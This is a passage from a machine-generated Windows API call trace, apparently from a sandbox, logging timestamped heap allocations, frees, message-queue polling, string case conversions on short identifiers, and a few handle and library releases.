wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0190.636] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0190.636] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0190.636] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0190.636] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0190.636] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0190.636] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0190.636] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0190.636] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0190.636] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0190.636] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0190.636] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0190.636] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0190.636] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0190.636] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0190.637] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0190.637] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0190.637] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0190.637] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0190.637] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0190.637] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0190.637] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0190.637] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0190.637] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0190.637] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0190.637] CryptReleaseContext (hProv=0xaa3868, dwFlags=0x0) returned 1 [0190.637] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0190.637] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9c18 [0190.637] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1848 [0190.637] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa098 [0190.637] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0190.637] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0190.637] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13d8 [0190.638] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0190.638] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0190.638] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0190.638] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0190.638] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0190.638] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b88 [0190.638] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13d8 [0190.638] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0190.638] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0190.638] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0190.638] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0190.638] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b88 [0190.638] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0190.638] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13d8 [0190.638] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0190.638] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0190.638] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0190.638] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0190.638] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0190.638] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0190.639] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0190.639] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0190.639] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0190.639] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0190.639] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0190.639] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0190.639] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0190.639] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0190.639] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0190.639] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0190.639] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0190.639] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0190.639] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0190.639] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c18 | out: hHeap=0x25c0000) returned 1 [0190.639] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa098 | out: hHeap=0x25c0000) returned 1 [0190.639] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0190.639] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0190.639] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0190.639] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0190.639] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416270 | out: hHeap=0x25c0000) returned 1 [0190.640] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0190.640] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0190.640] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0190.640] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0190.640] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c18 [0190.640] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0190.640] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0190.640] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c18 | out: hHeap=0x25c0000) returned 1 [0190.640] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0190.640] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9fc0 [0190.640] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0190.640] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0190.640] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0190.640] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0190.640] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa098 [0190.640] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0190.640] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0190.640] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0190.640] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0190.640] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1758 [0190.641] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c18 [0190.641] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0190.641] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c18 | out: hHeap=0x25c0000) returned 1 [0190.641] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0190.641] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0190.641] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0190.641] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa098 | out: hHeap=0x25c0000) returned 1 [0190.641] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0190.641] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0190.641] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0190.641] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0190.641] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0190.641] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0190.641] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0190.641] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0190.641] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa098 [0190.641] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0190.641] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0190.641] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0190.641] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0190.641] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0190.642] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0190.642] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa098 | out: hHeap=0x25c0000) returned 1 [0190.642] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0190.642] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0190.642] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0190.642] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0190.642] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0190.642] FreeLibrary (hLibModule=0x74d40000) returned 1 [0190.642] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0190.642] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0190.642] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0190.642] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0190.642] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0190.642] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0190.642] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0190.642] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0190.642] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0190.642] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0190.642] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0190.642] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0190.642] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0190.643] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0190.643] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0190.643] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0190.643] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0190.643] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0190.643] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0190.643] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0190.643] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0190.643] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0190.643] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0190.643] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0190.643] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0190.643] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9c18 [0190.643] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa080 [0190.643] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9fc0 [0190.643] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa098 [0190.643] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa068 [0190.643] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c18 [0190.643] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0190.643] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa020 [0190.644] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0190.644] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0190.644] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0190.644] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0190.644] CloseHandle (hObject=0x268) returned 1 [0190.644] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0190.644] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0190.644] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b7a48 | out: hHeap=0x25c0000) returned 1 [0190.646] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0190.646] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0190.647] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0190.647] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0190.647] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0190.647] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0190.647] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa098 | out: hHeap=0x25c0000) returned 1 [0190.647] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0190.647] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0190.647] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0190.647] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c18 | out: hHeap=0x25c0000) returned 1 [0190.647] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0190.647] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0190.647] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0190.647] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0190.647] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0190.647] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0190.647] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0190.647] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0190.647] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0190.647] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0190.648] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0190.648] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0190.648] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0190.648] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0190.648] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0190.648] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0190.648] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0190.648] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0190.648] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa068 [0190.648] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9fc0 [0190.648] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa098 [0190.648] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0190.648] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9c18 [0190.648] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c18 [0190.648] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0190.648] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa020 [0190.649] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0190.649] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0190.649] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0190.649] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0190.649] CloseHandle (hObject=0x294) returned 1 [0190.650] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0190.650] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0190.650] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24c7a50 | out: hHeap=0x25c0000) returned 1 [0190.651] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0190.651] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0190.651] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0190.651] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0190.651] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0190.651] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0190.651] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0190.651] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa098 | out: hHeap=0x25c0000) returned 1 [0190.651] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0190.651] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0190.651] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c18 | out: hHeap=0x25c0000) returned 1 [0190.651] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0190.651] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0190.651] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0190.651] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0190.651] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0190.651] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: 